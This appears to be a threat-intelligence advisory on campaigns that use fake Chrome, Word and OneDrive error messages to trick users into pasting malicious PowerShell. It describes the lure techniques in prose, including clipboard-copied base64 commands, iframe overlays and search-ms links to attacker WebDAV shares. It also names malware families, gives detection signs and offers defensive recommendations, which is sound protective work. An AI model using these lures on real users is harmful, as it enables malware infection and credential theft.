Security researchers have discovered a new attack campaign where hackers use fake error messages from Google Chrome, Microsoft Word, and OneDrive to trick users into running malicious PowerShell scripts.

Attack Method

Hackers exploit vulnerable websites to display an overlay to show fake error messages. These messages instruct victims to copy and paste PowerShell scripts into Windows PowerShell with administrative privileges.

Security experts have identified three distinct attack types:

• ClearFake Campaign: Victims access compromised websites to download malicious scripts stored on the blockchain via Binance's Smart Chain contracts. The malware checks the victim's device and displays a fake Google Chrome warning, prompting users to install a root certificate via a PowerShell script. When executed, the script clears the DNS cache, erases clipboard content, displays bait messages, and downloads additional payloads, including information-stealing software.

  

  Figure 1. Fake Google Chrome notification tricks victims into pasting malicious scripts

• ClickFix Campaign: Attackers exploit iframe embedding features on compromised websites to overlay fake Google Chrome error messages. Victims are instructed to open Windows PowerShell with administrative privileges and paste the provided script, leading to infections with various malware, including DarkGate, Matanbuchus,...

• Email-based Infection Chain: Attackers use HTML attachments resembling Microsoft Word documents. Users are prompted to install the Word Online extension or are shown an error message offering "How to fix" and "Auto-fix" options. The "How to fix" option copies a base64-encoded PowerShell command to the clipboard, instructing users to paste it into PowerShell. "Auto-fix" uses the search-ms protocol to display a fix.msi or fix.vbs file stored on WebDAV on a remotely controlled share by the attacker.

  

Figure 2. HTML page impersonating Microsoft Word to trick victims into pasting malicious scripts

Signs of Attack

Here are some methods to detect this attack campaign:

• Malicious domains and websites hosting fake error messages and PowerShell scripts.

• Malicious URLs related to downloading payloads.

• PowerShell commands instructing users to run code that modifies system settings, downloads malware, or installs certificates.

• Malicious payloads such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, clipboard hijackers, Lumma Stealer.

• File types like HTML attachments in spam emails, Base64-encoded PowerShell commands, as well as malicious MSI and VBS files.

Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent this attack campaign:

• User Awareness Training: Emphasize the dangers of executing PowerShell commands from untrusted sources, especially the risks associated with downloading and running scripts from fake error messages.

• Implement Email Security Solutions: Deploy email filtering features to detect and block malicious attachments and links.

• Secure Browsers and Systems: Enable security features in browsers to block malicious scripts and overlays.

• Deploy Endpoint Protection Solutions: Aim to detect and block malicious PowerShell activities.

• Use Cybersecurity Services: Monitor network traffic to detect signs of unusual activity, such as strange PowerShell executions or connections to malicious domains. Use firewalls and intrusion detection systems to identify and prevent suspicious behavior.

• Patch Updates: Regularly check and update patches for operating systems, browsers, antivirus, and anti-malware software.

References

• Fake Google Chrome errors trick you into running malicious PowerShell scripts

• Fake Google Chrome errors trick you into running malicious PowerShell scripts (18th June 2024)

• Chrome security alert — clicking this error will open the malware floodgates on your PC